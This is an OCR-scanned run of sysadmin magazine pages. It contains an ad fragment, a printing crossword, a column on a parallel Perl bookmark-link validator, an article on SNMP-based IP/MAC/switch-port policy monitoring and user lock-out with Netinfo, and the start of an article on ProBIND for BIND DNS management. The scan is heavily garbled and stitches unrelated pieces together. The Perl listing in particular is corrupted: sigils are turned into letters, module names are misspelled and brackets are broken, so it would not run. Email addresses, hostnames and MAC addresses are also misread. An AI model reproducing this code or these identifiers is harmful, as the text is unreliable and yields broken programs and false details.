within a tew short minutes. Tt you don’t mind a slower response 
time, feel free to email me directly (f ran k@revsy s . com), 

Frank Wiles is the IT Manager for Sunflower Broadband in Lawrence, Kansas 
(http:// KW. sun f 1 ow&r, COiil). He also does systems administration and 
programming consulting via his company Revolution Systems , LLC. Frank can 
he reached at: frank@revsys , cow. 



LRS has more than 20 years of experience providing robust output 
management solutions to customers in over 30 countries — including 
the majority of Fortune 500 firms. 

VPSX is a powerful, standalone output management solution to 
replace home-grown printing programs and obscure print commands 
Get enhanced socket printing, browser-based SMNP management, 
detailed accounting, support for PAM, SOAP, J2EE, and more. 


Across 

3. Advanced formatting com¬ 
mand to convert text files to 
PostScript 

4. Command to configure 
printers and class queues 

5. BSD command to add a print 
job to a queue 

8. Command to display or set 
printer options and defaults 

10. Simultaneous Peripheral 
Operation On-Line (abbrevia¬ 
tion) 

11. Sys V command to cancel a 
request to an LP print service 
13. Abbreviation for Pluggable 
Authentication Modules, used 
as an authentication method 


14. LP print service uses this 
environment variable as the 
default destination printer 

Down 

1. Abbreviation for Simple 
Network Management Protocol 
used for exchanging informa¬ 
tion between the console and 
managed entities (e.g. printers) 

2. Printer Command Language 
(abbreviation) 

6. Sys V command to send 
print job data to printers and 
monitor spool directories 
9. Command to print files with 
basic formatting 
12. Line Printer Daemon 
(abbreviation) 


Answer to 
Next Week's 
Printing Puzzle 


Contact us for more information at 217-793-3800, or email us at 
askLRS@LRS.com. 


roe Street • Springfield, IL 62704 • 217.793,3800 
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Checking Your Bookmarks 


L ike most people. I've bookmarked about a third of the known 
Internet by now. Of course, sites go away, and URLs become 
invalid, so some of my lesser-used bookmarks are pointing 
off into 404-land. 

Some browsers have an option to periodically revalidate book¬ 
marks. My favorite browser lacks such a feature, but it does include 
the ability to export an HTML file of all the bookmarks and reim¬ 
port a similar tile in a way that can be easily merged back into my 
existing bookmark setup. So. I thought I'd take a whack at a Perl- 
based bookmark validator, especially one that worked in parallel so 
that I could gel through my bookmark list fairly quickly. The result 
is in Listing 1, below. 

Lines 1 through 3 declare the program as a Perl program and 
turn on the compiler restrictions and warnings as good program¬ 
ming practice. 

Lines 5 through 7 pull in three modules that are found in the 
CPAN. The HTML:: ParSer module enables my program to 
cleanly parse HTML with till its intricacies. Tht 
LWP:: Paral 1 el: :UserAgent module provides a means to fetch 
many Web pages at once. And finally, HTTP: :Request: iCoitiinon 
sets up an HTTP :: Request object so that I can fetch it with the 
user agent. 

Lines 9 and 10 set up the user interface for this program. 1 can 
use the program as a filter: 

./this_progran kBookroarks.litflil )NewBookmarks.html 
or as an in-place editor: 

./this_program Bookmarks.htrrl 

As an in-place editor, the Bookmarks.html file will be renamed to 
Bookmarks.html~ (with an appended tilde), and the new version 

will appear at the original name. 

Lines 11 to 19 edit each file (usually just one) in turn, or the 
standard input as one file. Line 12 slurps the entire tile in to Two 
passes are performed over the HTML text the first pass in line 14 
finds the existing links, and the second pass in line 18 edits the 
HTML with additional DEAD - text for links that were found broken. 
In between, we’ll check the validity of the discovered URLs, in line 
16. This is our entire top-level code, using named subroutines to 
clearly delineate the various phases and couplings of this program. 1 
find it helpful to break down a program in this way. 

Let’s look at how the links are found, in the subroutine beginning 
in line 21. First, we’ll accept the input parameter in line 22. Second, 
well create a staging variable for the return value in line 24. 


Lines 26 to 34 create an HTML::Parser object. Creating a parser 
object is an art form, because there are so many buttons and dials 
and levers on the instantiation and later reconfiguration of the 
parser. My usual trick is to find a similar example and then modify 
it until it does what I want. 

In this case, we want to be notified of all start tags, so we 11 
define a start handler (line 28) consisting of an anonymous subrou¬ 
tine (lines 29 to 32) and a description ot the parameters that will be 
sent to the subroutine (line 33). We’re asking for the taqrame (like 
“a”) and the attribute hash as the only two parameters. We extract 
these parameters in line 30. 

Line 31 ignores all a tags that don’t have an href attribute, 
which skips over local anchors and anything else more bizarre. Line 
32 creates an element in the hash with the key being the same as the 
URL. The value is unimportant at this point, although we check 
whether the value is DEAD later, so that would be a bad value for an 
initialization. 

Once the parser is created, we’ll tell it to parse a string and then 
finish up in line 36 and 37. When start tags are seen, the requested 
callback is invoked, populating the Xurls hash at the appropriate 
time. At the end of the input string, we’ll return a reference to that 
populated hash so that the caller has some data to manipulate. 

The val i date_l i nks routine (beginning in line 42) is really the 
heart of this program, because we 11 now take the list ol URLs (the 
keys of the hash in line 43) and verify that they are still dot-com, not 

dot-bomb. 

Line 45 creates the parallel user agent object. This object is a 
virtual browser with the ability to fetch multiple URLs at once 
(default 5). The max_$ize value says that we don’t need to sec 
anything past the first byte of the response, so w'e can stop when 
the first “chunk” of text has been read from the remote server. 
(This is actually a feature of LWP:: UserAgent, from which 

LWP:: Paral lei:: UserAgent inherits.) 

Lines 47 to 49 set up the list of URLs that the user agent will 
letch once activated. We’ll just grab the keys (efficiently) from 
the hash referenced by $ur 1 S and call the regi sfer method ol the 
user agent with an HTTP:: Request object that GETs the corre¬ 
sponding URL. 

Line 51 is where our program will spend most of the "real 
time. The wait method call tells the user agent to do its job. wait¬ 
ing at most 30 seconds for each connection and response. The 
result of the wait method is a hashref whose values are 
LWP:: Paral 1 el:: UserAgent: : Entry objects representing the result 
of attempting to fetch each page. Calling request on these objects 
(as in line 52) gives us the original request, while the response 
method (as in fine 53) gives us the corresponding response. We 
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Listing 1 Perl-based bookmark validator 

#!/usr/bin/perl 
use strict; 
use warnings; 


= 2 - 
" 3 =* 

- 4 - 
- 5 - 
-6- 

- 8 - 
= 9 = 

= 10 ' 
- 11 = 

- 12 = 

- 13 - 

= 14 = 

- 15 - 

-16- 

- 17 - 

- 18 - 

=19= 

= 20 - 

= 21 = 

- 22 - 

= 23 = 

- 24 - 

= 25 - 

- 26 - 

- 27 = 

- 28 = 

= 29 = 

- 30 = 

-31- 

- 32 - 

= 33 - 

- 34 - 

- 35 - 

= 36 = 

- 37 = 

- 38 = 

- 39 = 

- 40 = 

- 41 - 

- 42 = 

= 43 - 

= 44 = 

- 46 = 

- 46 = 

= 47 = 

= 48 = 

= 49 - 

= 50 = 

- 51 = 

- 52 = 

- 53 - 

- 54 = 

- 55 - 

= 56 - 

- 57 - 

- 58 = 

- 59 - 

- 60 = 

- 61 - 

= 62 = 

- 63 - 

- 64 - 

- 65 - 

= 66 = 

-67- 

= 68 - 

= 69 - 

- 70 - 

- 71 = 

- 72 = 

- 73 - 

- 74 - 

- 75 - 

- 76 - 

-77- 

- 78 = 

- 79 - 

= 80 = 

- 81 = 

= 82 = 

= 83 - 

= 84 = 

- 85 - 

- 86 - 

-87- 

- 88 - 

- 39 = 

- 90 = 

-91- 

- 92 - 


tt act as filter if no names specified 


use HTML::Parser; 

use LHP: :Parallel: :liserAgent; 

use HTTP;:Request::Common; 

$M = 

@ARGV - unless @ARSV: 
while (@ARGV) [ 
t_ - do ( local $/; <> }; 

my turls - extractj inksCS_): 

val idate_links($url s); 

rewrite_html($_, turls); 

1 


sub extract_links { 
my thtml = shift; 

my Surls; 

my tp - HTML::Parser~>new 

( 

sta rt_h -> 

[sub { 

my (ttagname, tattr) = 

return unless ttagname eq "a" and my thref - tattr->(href); 
turlslJhref} = 

), "tagname, attr"], 

) or die: 

tp->parse(thtml); 

$p->eof; 


return VJurls; 

} 

sub validate.!inks { 

my turls - shift; it hashref 

my tpua - LWP::Parallel::UserAgent->new(max_size -> 1); 

while (my (turl) - each SSurls) { 
tpua->registertGET turl): 

} 

for my (entry (values X{tpua->wait(30)l) { 
my turl = tentry->request->url; 
my tsuccess - tentry'>response->is_success; 
warn +($urls->{turl} = tsuccess 7 "LIVE” : "DEAD"). 


turl\n": 


return void 


} 


sub rewri tejitml I 
my thtml = shift; 
my turls - shift; 

my tdead - 0; 

HTML::Parser->new 


it hashref 

it mark the next text as "DEAD 


my tp 

( 

startji -> 

[sub { 

my (ttext, ttagname, tattr) = 
if (ttagname eq "a" and my thref - iattr-Xhref 1) 1 
tdead - 1 if turls-Mihref} eq “DEAD"; 

1 

print ttext; 

}, "text, tagname. attr“], 
textji -> 

[sub I 

my (ttext) - 

if (Jdead) { ,„ Ptn , 
ttext - "DEAD - ttext" unless ttext =~ /DEAD -/: 

tdead - 0; 

} 

print ttext; 

]. "text"]. 
default_h => 

[sub { print shift }, 'text'], 

) or die; 

tp->parse($html); 
tp->eof; 
it return void 


1 
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fetch the original URL. and its success status into a couple of vari¬ 
ables and then update the hash referenced by Juris with a 
LIVE/DEAD code in line 54. also logging each result to STDERR for 
i nformat io n purposes. 

Once we have a hash mapping each L'RL to a LIVE/DEAD 
code, it’s time to patch up the original file, marking all dead links 
with a prefix of DEAD using the rewri te_htm1 routine beginning 
in line 60. 

Lines 61 and 62 capture the incoming parameters: the original 
HTML text, and the reference to the hash of the URLs, and their status. 

Line 64 sets up a $dead flag. If we see a start tag that begins a 
link to a dead page, we'll set that flag true, and then update the first 
following text to include our DEAD - prefix, resetting the variable as 
needed. 

Lines 66 to 87 set up a new HTML:: Parser object. This one is a 
bit more complex than the previous one, because we have to watch 
for link start tags, the text of links, and copy everything else 
through. 

As before, a start handler is enabled, starting in line 68. Because 
we're now echoing the input text, we’ll ask for the original text as 
one of the parameters, displayed in line 74, 

Lines 71 to 73 determine whether the current tag is indeed a 
dead link. If so. line 72 sets Sdead to 1. 

Line 76 defines a text handler, called as the parser recognizes the 
text of the HTML document. If we see some text, and our Sdead 


flag is set. we'll prefix the existing text with DEAD - and reset the 
Sdead flag. If the text already has the dead flag, we’ll leave it alone, 
so that we don't keep prefixing new additional text on every access. 
The original or altered text is then printed in line 83. 

Lines 85 and 86 define a “default" handler, called for everything 
else that isn't a start tag or a main text, such as end tags, comments, 
processing instructions, and so on. Here, we're just passing through 
everything we don’t otherwise care about. 

Lines 89 and 90 cause the incoming HTML to be parsed, result¬ 
ing in the majority of the text being passed unmodified to the default 
output handle, except for the dead links, which will have been 
appropriately altered. 

And that’s all there is! I save the current bookmarks into a file, 
run the program, wait until it completes, and then I re-import the 
modified HTML file as my new bookmarks. And now my book¬ 
marks are all fresh and shiny new. Until next time, enjoy! 

Randal L. Schwartz is a two-deeade veteran of the softw are industry — skilled 
in software design, system administration, security, technical writing, and 
training. He has coauthored the “must-have" standards: Programming Perl 
Learning Perl, Learning Perl for Win32 Systems, and Effective Perl 
Programming. He 's also a frequent contributor to the Per! newsgroups, and 
has moderated comp.king.perl.announce since its inception. Since 1985. 
Randal has owned and operated Stonehenge Consulting Services , Inc. 
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NETWORKING 


IP Policy Enforcement with Netinfo 

Stefanos Harhalakis 


A common problem faced by systems administrators who 
don’t have complete management of their network is TP 
policy enforcement. There are a lot of tools for monitoring 
routers and switches (referred as network devices), but there are few 
for monitoring the leaf nodes and their status. 

It is not uncommon to find that there is a duplicate IP in a net¬ 
work or that a user has changed his IP address or even the location 
of his computer. (Here, “location” describes the switch port of a 
user and not the actual physical location.) An administrator may 
need to spend a couple of hours to actually resolve a duplicate IP 
issue because he has to find both machines online. 

Common policy enforcement techniques utilize MAC address 
databases where each machine must be registered to be allowed to 
access the network from specific switch ports. This solves the prob¬ 
lem in a tightly managed network but cannot prevent intruders from 
abusing public access places. It is also almost impossible (and very 
time consuming) to create and maintain a valid up-to-date MAC 
address database. 

Generally there are three entities comprising a network policy: 

* IP addresses 
• MAC addresses 
• Switch ports 

With the introduction of Layer 3 switches, a "sw itch port” is not dif¬ 
ferent from a “router port”. It is more convenient to refer to these as 
network device ports and distinguish them as: 

* Switched ports 
• Routed ports 



- A. 




Typically, an administrator will need to define restrictions on vari¬ 
ous combinations of these entities. For example, it may be desirable 
to restrict a particular MAC address to a specific switch port or 
range of ports or to bind a MAC address to a particular IP address. 
Similarly, the administrator may want to restrict a particular IP 
address to a specific set of ports. 

This description can be represented with a triangle with IP. 
MAC, Port as comers and a two-way arrow on each edge: 


ip 



Here an IP address restricts the MAC address, a MAC address 
restricts the IP address, a MAC address restricts the Port, a Port 
restricts the MAC address, and an IP address restricts the Port or a 
port restricts the IP address. It must be understood that IP->MAC is 
not the same as MAC >IP because an IP address may be used by 
one MAC address only, but a MAC address may he allowed to use 
more than one IP addresses. 

Here are some examples that illustrate these restrictions: 

• A user has her computer on a switched port (let's say FastEthernet 1). 
The administrator wants to allow this user to change her computer 
without being bothered, so he associates the port address to only 
allow access to this user's IP address. If this user ever changes her 
IP address, the administrator will be notified. Note that the user 
will be able to change her NIC. We may also want to restrict this 
TP address to only be allowed to be used at this switched port. 

• A user owns a laptop computer and has a configured address for it. 
Now this laptop can be found in a lot of places; DHCP may help 
here, but sometimes we want to reserve special addresses for peo¬ 
ple so we must maintain another IP<->MAC database in the 
DHCP configuration. We simply allow this user to have a fixed IP 
address, and we associate his MAC address to his IP address and 
vice versa. This way no one else will be able to use this IP address, 
and this MAC address will use only this IP address. 

Policy Enforcement 

Enforcing the policy consists of: 

• Monitoring the network and collecting data. 

• Processing data and detecting violations. 

• Performing actions tor detected violations. 

There can be two approaches to policy enforcement. First, you 
can prevent violations from happening. This technique is quite 
hard to be implemented and administered. It also does not 
inform the administrator ot violations (most of the time). 
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Figure 2 Per subnet view 
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Discovered IP addresses (group 195.251.123.0/24) 


IP 


195.251,123.1 

(swHCJt.beifthe.gr) 

(Piirofariki) 


195,251 123.97 
(finnte r_v asi I a I .c .it Jsrthe gr ) 
(PliroforiU) 


195.251.123,99 

(athina.itt&ithe.gr) 

(PlirofonLi) 


195.251.123,101 
(thanasis .Ft .teithe .gr) 

(Pltroforil i) 


195,251.123 103 

(vasiSai o it.teith^.gr) 
(Pliroforfli) 


195.251.123.105 
(PI rroforil.ii) 


195.251,123,106 

(cthe,itrteith©.gr) 

(Phroforiki) 


Location 


00 Qa:4l:Oh:4e:0O 
(cisco stems, inc) 


00:Q2:b3:ae:f9:54 
{tntel corporation) 


00:03:47:ff:7e:4b 
(Intel corporation) 
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(intel corporation) 


s*-it - Vlan301 
(Lab 301) 


ttnrifc-302 - FaO/8 


itHnfo302 - FaQ/16 


it-info302 - FaQ/19 


it-?nfo 302 - FaO/17 


it-infoOOS - FaG/7 


Registered 


itHnfo302 - FaQ/lG 


lt4nfo302 -FaO/11 


Last 5h 
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Aug 27 - 11:40 EEST 


Aug 27 - 14:10 EEST 


Aug 27 ~ 14:10 EEST 


Aug 27 - 13:50 EEST 


Aug 28 - 22:50 EEST 


Aug 26 - 13:40 EEST 


Figure 3 Per monitored device view 
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tnterfacie 

IP 

MAC 

When 

Action 

FasttthemetOM 

195.251-123.196 
(tsa rou:ns -it .teith e ,gr) 
(PlirofcnLi) 

00:10:83:5b: 00:78 
(hewlett-pad ard company) 

Aug 27 - 12:40 EEST 

Delete 

FastEthemeb:!/*? 

195.251,123 199 
(Ueftouri .it .teithe. gr j 
[Pliroforiki) 

00:03:47:60:82:75 
(intel corporation) 

Aug 27 ■ 12:40 EEST 

Delete 

FastEthern£t0/6 

195.251.123.198 

(vFtsas.rt.terthe.gr) 

(Pliroforiki) 

O0;O3:47:fd:d3:«2 
(intel corporation) 

Aug 26 - 13:50 EEST 

Delete 

FastEthAinetO/B 

195.251,123200 

{Plirafciriki) 

00:03:47:ff:7d:c7 

{intel corporatiCFn) 

Aug 24 - 13:50 EEST 

Delete 

Fa stE thereto/11 

195,251.123.204 
(de mosthen&s -it-terthe. ar) 
(Pliroforil j) 

00:03;+7:74:£9;3b 
(*ntet corporation) 

Aug 27 - 14:10 EEST 

Delete 

FastEth«metd/l5 

195.251.123,206 
(artemis rt.teithe.gr) 
(Ptirofonki) 

00 :eO: 29:6a: 77:9b 
(standard microsvst*ms corp.) 

Aug 16 - 14 10 EEST 

Delete 


Second, you can detect violations and 
perform some actions, either by hand or 
by means of scripts/programs. 

Experience shows that policy "enforce¬ 
ment” is not always required, however, it is 
often more convenient simply to monitor 
policy violations instead of enforcing. 

Users who violate network policy must 
not be considered as intruders. In fact there 
are cases where it is more important for a 
user to have network access even if he has 
violated the policy rules. After monitoring 
our network for about tw ; o years, we found 
that abuses made up about \ c k of the total 
number of violations detected. Allowing a 
user who has performed a violation to have 
network access also helps in case of false 
alarms and administration mistakes. 

The MAC<->IP restrictions are less 
frequently used when we have the 
MAC<->Port and lP<->Port options. This 
should be expected since a MAC address 
database for 1000+ machines is very hard 
to create and maintain. There are also cases 
where machines are discarded and stale 
entries remain in the database. 

Collecting the Information 

Collecting the information can be 
quite easy as long as the hardware sup¬ 
ports it. Here 1 will focus on Cisco 
devices, but this technique can be applied 
to other hardware vendors, too. We're 
going to collect information using SNMP 
so it must be enabled to network devices 
(more on this later). 

We’ll use PostgreSQI- to store the 
information. For our purposes, we will 
need to create tables to hold the data and 
will also need to timestamp them. 
Timestamping the collected data is essen¬ 
tial because we want our system to 
remember what happened. Creating a sim¬ 
ple program that only knows the current 
image is easier but it leads to great troubles. 
There are cases where devices are being 
shut off or are inaccessible that can mess 
up our image of the network. 

We need to have a table tor all the 
devices that we’re going to monitor in our 
network (referred to as monitored network 
devices or monitored devices). I his table 
holds the IP address of each device (routers 
and switches), the community string, a 
unique ID (we should not use the IP 
address for performance issues), and a con¬ 
venient name. 

Before beginning, we need to know 
which interfaces are available to each 
monitored network device so that we 
can map users to interfaces later. We do 
this by fetching IF-MIB::ifDescr and 
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IF-MIB:: if Alias for each device, which 
will give us names and descriptions for 
each interface. We store this information 
in a table that contains a unique ID for 
each entry, a device ID. the if index value 
of each interface, the interface name, and 
the interface description. 

We also need to collect the following: 

• lF-MlB::ifPhysAddress, which holds the 
MAC addresses of each interface. 

• TP-MIB::ipAdEntlflndex, which holds the 
IP addresses that are configured on each 
interface. Such an entry indicates that a 
port is a routed port so we mark it appro¬ 
priately. We combine this information 
with !P-MlB::ipAdEntNetMask and now 
we know which IP networks are available 
in our network. This is very useful 
because w r e will not have to manually 
update a list of our IP networks. This 
solves a problem when Proxy ARP is 
implemented and the ARP tables are 
tilled with useless (for our purposes) 
information. 

• mib-2.17.1.4.1.2. which has a mapping of 
iffndex with an internal interface number. 
It is required for Cisco devices only. 

• enterprises.9,9.46.1.3.1.1.3.1. which returns 
a list of all the configured VLANs in the 
switch. This is required for Cisco devices 
because they need to be queried for each 
VLAN as if they were different devices 
using a community name in the form of 
XXXX@vlanID where XXXX is the 
community name. Requesting informa¬ 
tion for public will return information 
about vlanl only, so we need to perform 
another request using public@2 if there is 
a VLAN2 configured. 

• IF-MlB::ifType, which holds the IANA 
interface type ID. This is required because 


we want to ignore some interfaces and 
mask out VLANs. 

Next, we want to know which IP addresses 
are being used by each MAC address in out- 
network. This can be done by collecting all 
the ARP tables (let's say every 15 minutes) 
using IP-MlB::ipNetToMediaPhysAddress. 
We want the ARP tables from routers 
because they hold associations for all the 
IPs that are known on each routed port. 
Since switches can be Layer 3 and can have 
routed ports, we are forced to collect the 
ARP tables from them. too. For each ARP 
entry we collect, we update our database by 
storing the new IP-MAC pairs and updating 
existing ones. ARP tables can have only 
one entry per IP address so we will use the 
IP address as the primary key of that table. 

We also want to know where each MAC 
address is located. For Cisco switches this 
is known as ‘'mac-address-table" (for 
switches running IQS) or “content address¬ 
able memory (CAM)" (for switches run¬ 
ning CatOS). Both of these map a MAC 
address to an interface that is known by 
fetching mib-2.17.4.3.1.2 and returning the 
MAC address to port assignments. We also 
need to get mib-2.17.4.3.1.3, which tells us 
how each MAC address is known (learned, 
security, internal, etc.). 

This information by itself is all we need 
to know about our network. The catch here 
is that when we have something like: 

Switch 1 (port FaO/1) <—> (port FaO/l) 
Switch2 <—> 10 machines 

The MAC addresses of the i 0 machines arc 
known to Sw itch I and Switeh2 also. 
Switch I will report them as being behind 
its FaO/1, and $witch2 will report them in 
their correct location. In this case, we 


ignore Switch l and use the information 
from Switch2 because it has more details. 
Since we’re monitoring both switches, we 
know w'hat the internal MAC addresses of 
Switch2 are (via IF-MIB::ifPhysAddress 
and mib-2.17.4.3.1.3). 

By combining this information, we 
can find out that port FaO/1 of Switch 1 
has another monitored device behind it. 
For the sake of simplicity, we will 
assume that all monitored devices are 
connected using point-to-point links 
(with no hubs or other lion-monitored 
devices between them). Now' we can fil¬ 
ter out all information about FaO/1 of 
Switch I. This applies only to non-routed 
interfaces. 

We store this information in a table by 
itself that says that MAC address X is in 
interface Y. w here Y is an ifid that can be 
used to look up in the interfaces table and 
return the device and interface 
name/description. 

Figure 1 is the complete database 
schema that is used to store this informa¬ 
tion. A table named “netdevs” contains all 
the devices we are going to scan. This 
table is filled and maintained by us. Its 
fields are: a device ID. the IP address, a 
name, the community, and a timestamp 
that indicates when we got data from this 
device (this can help to detect devices that 
are not reachable). 

There is also a table named “interfaces”, 
w'hich holds the discovered interfaces of 
the network. Here we have a unique ID, the 
device ID indicating w'hich device this 
interface corresponds to. the itDescr, the 
it Alias, and the ifType. There are also tw o 
timestamps, as follows: 

Is: This timestamp indicates when this 
interface was last detected. This is used 
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to expire interfaces. There are times 
when a device is not reachable or a net¬ 
work error occurs during the SNMP 
communication, so we don't w'ant to 
remove interface entries the first time 
ihev are not detected. Usins a time- 

c 

stamp, we can expire interfaces after a 
number of days. 

Iast_had_netdev: This timestamp indicates 
when a monitored network device was 
last detected on this port. Just as with 
"Is”, we want to hold a timestamp and 


not a simple Hag. because the connected 
device may become unavailable. This 
kind of instability will lead to an incor¬ 
rect network view, cause false alarms, 
and mess up the recorded history of the 
network. 

Next, the “macs" table lists all the discov¬ 
ered MAC addresses of our network. For 
each entry, there is the interface where this 
MAC entry was last seen and a timstamp. 


Figure 4 IP changes 
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Figure 5 Possible IP conflicts 
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The “ips" table stores all discovered 
ARP entries (ip. mac) with a timestamp 
(ts). and the “subnets" table stores all dis¬ 
covered subnets. The "history” table is 
explained later. 

All tables except “netdevs" have a 
“flags” field, which is used to store various 
flags. There are also some fields named 
“shortdese”, "comments”, or “description”, 
which hold user notes and names. 

Combining the Information 

Now we can combine the collected data 
and see that IP address I is being used by 
MAC address M, which is being served by 
interface F. This information by itself is a 
great boost in our administration efforts. 
We can now view all our monitored devices 
and see which IP address and MAC 
addresses are on each interface (Figure 2). 
We can also find out who owns MAC 
address M and where that user is located 
(Figure 3}. 

Next, we need to store the history of our 
network. We create a table that holds 
IP:MAC:Interface pairs and a timestamp 
for each one. Every time we collect data, 
we update this table by inserting new 
entries and updating the timestamp of exist¬ 
ing ones. This way we can easily find out 
which IP addresses were used by MAC 
address M in the past or which MAC 
addresses used IP address I (Figure 4). We 
can also locate duplicate IPs (Figure 5). 

Creating Rules 

We want to implement a schema that 
can hold the policy of our network. We do 
this by populating the collected data with 
more information (descriptions, notes, 
flags) and creating three more tables to 
hold the IP-MAC. IP-Interface, and MAC- 
Interface associations. Those are enough 
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for all the six types of rules that were 
described. 

We populate those tables with informa¬ 
tion regarding what is allowed for each 
entity and we set some flags. For example, 
we edit an interface and say that it should 
sene only MAC addresses Ml. M2, and 
M3, and that only IP addresses 11 and 12 can 
appear there. This is done by inserting 
Interl'uce-MAC and IP-Interface associa¬ 
tions in the appropriate tables and by setting 
two flags that say that this interface should 
serve only the associated IPs and MACs. 

Detecting Violations 

Now we can validate our existing (and 
future) IP:MAC:Interface pairs against our 
policy and find out about intruders (Figure 
6). Using PostgreSQL capabilities, we can 
create functions and views that return the 
violations with a single SELECT statement. 
Most of the job is done within the database 
schema using functions and custom views 
so the user interface only needs to be an 
interface and nothing more. 

Policy Enforcement 

All violations are associated w'ilh the 
MAC address that corresponds to the user 
w'ho violated the policy. If we're going to 
enforce the policy, we will need to revoke 
network access from users that performed 
violations. To do this, we create another 
table named "blacklist", which will hold 
the MAC addresses of users in violation of 
policy and possibly a reason. This table is 
populated as the final phase of the collec¬ 
tion. This table can also be populated by 
hand so that the administrator can manually 
lock out a user. 

To perform actions on Cisco devices, 
we must telnet to them and perform an 
'‘enable”. So, we need to know the telnet 


usemame/password and the enable pass¬ 
word, The device table is extended to hold 
this information. 

Now, we have come to a point where we 
want to lock out users from our network. 
We can do this by shutting down their 
switch ports but that is not acceptable when 
there is more than one user behind each 
port. We need to add a kind of access list on 
those devices to prevent them from access¬ 
ing the network. Cisco switches can have a 
list of MAC addresses that are allowed 
behind each port (known as the “mac- 
address-table”), which can be configured 
by command prompt. For security reasons, 
we also don't consider adding MAC 
address tables to interfaces that are known 
to have other monitored network devices 
connected. 

Locking out users can introduce prob¬ 
lems so we want to restrict this as much as 
possible. We want to detect policy viola¬ 


tions, but we want to perform policy 
enforcement only in some places. Thus, we 
need to flag interfaces that will be accessed 
during policy enforcement by introducing a 
new flag for each interface. We also add a 
flag for each monitored network device so 
that we can disable policy enforcement on a 
device as a whole. 

There are two policy enforcement meth¬ 
ods to be applied: 

• On interfaces where we only allow a spe¬ 
cific MAC address, we create a MAC 
address table and configure it without 
waiting for a violation to happen. If there 
is a user in this MAC address table who 
performed a violation then his or her 
MAC address wall be removed during the 
next run. 

* On all other interfaces, w r e wait for a pol¬ 
icy violation to happen. Then we can get 
a list of all the known MAC addresses 


Figure 6 Policy violations 
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existing behind a given interface and add a MAC address table to 
it containing all those MACs except from the violators. This is a 
great relief for network administrators because they don't need to 
know which MAC addresses are behind each interface. After the 
MAC address table is added in the configuration, only those users 
will be able to access the network. 

A policy enforcement tool can be created using simple shell script 
commands. I've created a simple shell+expect script that reads data 
from the blacklist table and tries to enforce the policy as follow's: 

• It determines which devices require locking, 

• For each device, it telnets and removes the old configurations. 
Then it creates the new one. 

In fact, the script tries to be a little more clever, so it creates a list of 
expect scripts on each run. Then it compares that list w'ith the previ¬ 
ous one and, if there is a change, it will run. It will also run if a cer¬ 
tain amount of time has passed. This way there will be no extra load 
on switches. 

Data Expiration 

One tricky aspect is knowing when to remove entries from the 
database. We have the current image and a history table. We also 
have rules, notes, and descriptions that can become outdated in a 
couple of years. Discovered MAC addresses may not be needed 
after a couple of months. 


To ease the administration of such a system, we expire data 
based on timestamps. If after X months MAC address M is no 
longer being used, we can remove it from the system. At this time, 
we can also remove any policy data associated with the address. 
After all, if the address is being purged, we no longer care that it’s 
owned by user “Goofy” or bound to a particular IP address or port. 
This simple timeout algorithm goes a long way toward making 
the tool self-maintaining. With this approach, even for very large 
networks (say 100,000 MAC addresses) that are monitored for a 
couple of years, the database will not become very large and the 
performance will be pretty nice. 

For a sample of 58 monitored network devices we have found 
1400 interfaces. There are about 2100 unique IP addresses and 2600 
known MAC addresses. The MAC addresses are more than the IP 
addresses because the switches have a lot of internal MACs (at least 
one for each interface), and there are other (not monitored) 
switches, too. 

In case of malicious activity where someone tries to fill the mac- 
address-table by flooding the network with fake MAC addresses to 
make sniffing possible, a lot of new' MAC addresses will be discov¬ 
ered. In one such case, there were more than 30.000 MAC addresses 
reported for a switch port and stored to the database. Because of the 
expiry, however, those entries were auto-removed a couple of 
months later. 

The database access should be pretty fast even for very large 
networks. On a P3/866, it takes about 400 ms to combine all the 
data and produce a complete current view from within a quite 
complex PostgreSQL view- (using “explain analyze select * from 
view current” in the Netinfo database). 



Netinfo 

The algorithm and implementation described here is included in 
Netinfo v3.0. which is free software distributed under the General 
Public License. In fact, Netinfo does some more complex computa¬ 
tions and provides other (not well-tested) functions like “Hunting \ 
which can be used to insert rules for interfaces that have monitored 
network devices connected on them. These rules can then be auto- 
applied to all interfaces of all monitored network devices existing 
behind this interface. 

The whole idea has gone through a lot of stages of patching and 
rewriting, and I consider it to be very stable. At first, this method 
was created as a monitoring tool to map IPs, MACs. and Interfaces 
for the Technological Education Institute of Thessaloniki in Greece. 
Later, it was extended to have a history and hold some policy rules 
and to perform user lock-out. Then, it was rewritten from scratch to 
resolve database management and performance issues (and more). 

An administrator can add descriptions to subnets. IPs. MACs, or 
interfaces, which will be shown on each view. The program also 
knows about NIC vendors and determines them from the MAC 
address prefix. 

Stefanos Harhalakis is a graduate of the Department of Informatics of 
Technological Educational Institute (TED of Thessaloniki, Greece. He works 
as a Systems and Network Administrator for the Dept, of Informatics and pro¬ 
vides support to the Institute's NOC, and his activities include development of 
C/C++ applications atul facilities for network security and monitoring. 
Stefanos can be reached at: vl3@it.teithe.gr. 
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NETWORKING 


BIND Management Using ProBIND 

Mark Barrow 


I w as recently hired to sort out the management of a clients BIND 
DNS servers. They had deployed multiple BIND DNS servers 
running on Solaris to serve both internal and externa! DNS for 
themselves as well as primary and secondary DNS services for 
many of their customers. The current solution involved editing the 
zone files on each master server (Intemal/External), then reloading 
the DNS into a test namespace to check for errors (using nslookup. 
etc.} before deploying to the production namespace and running a 
Perl script to reload all of the 
servers. Although extremely stable, 
it was necessary that skilled sys 
admins spend a lot of time manag¬ 
ing the solution. They wanted a 
solution that that could he main¬ 
tained by other office staff. 

1 was asked to investigate GUI- 
based management products that 
could replicate this functionality and 
decrease the sys admins’ workload. 

Furthermore, the client wanted to 
stick with BIND because it had been 
extremely stable in production. This 
is how 1 encountered ProBIND. 
which seemed to fit the bill perfectly. 

ProBTND is an open source 
PH P/My SQL-based Web application 
that can be used to distribute DNS 
data to multiple BIND 8/9-based DNS servers. It is currently main¬ 
tained by Alexi Roudnev at: http://probind2.sourceforge.net. 

ProBIND holds all the data on zones and servers in a central 
MySQL database. This is a one-way relationship, which means that if 
you currently use BIND you will need to import the current data first. 
However, it’s very easy to add new servers or rebuild failed ones. 

Benefits of Using ProBIND 

ProBIND is an easy-to-use Web interface that can be used to 
manage multiple BIND servers and namespaces. ProBIND can 
automatically populate your reverse zones as new records are 
added. With the Perl::DNS module, ProBIND can be used to check 
the servers; all data is held in a central database simplifying the 
backup process for multiple DNS servers. ProBIND can he config¬ 
ured to authenticate users and provides granular access through 
DNS-Admin or DNS-User roles. 

The Solution 

For the purposes of this article, the DNS infrastructure consists 
of three external servers (two secondary and one hidden primary) 
and two internal DNS servers (one primary and one secondary). See 
Figure 1. 


ProBIND was installed onto the external hidden master DNS 
server. This was firewalled so that only the two external secondary 
servers were directly accessible from the Internet, and only DNS 
queries from the external secondary servers would be accepted 
